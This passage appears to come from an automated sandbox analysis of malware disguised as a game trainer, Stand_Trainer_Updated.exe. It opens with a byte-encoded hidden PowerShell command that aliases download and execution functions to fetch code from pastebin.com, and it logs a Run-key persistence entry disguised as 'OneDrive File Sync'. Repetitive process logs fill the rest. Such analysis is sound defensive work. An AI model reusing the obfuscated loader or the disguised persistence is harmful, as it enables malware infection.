0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
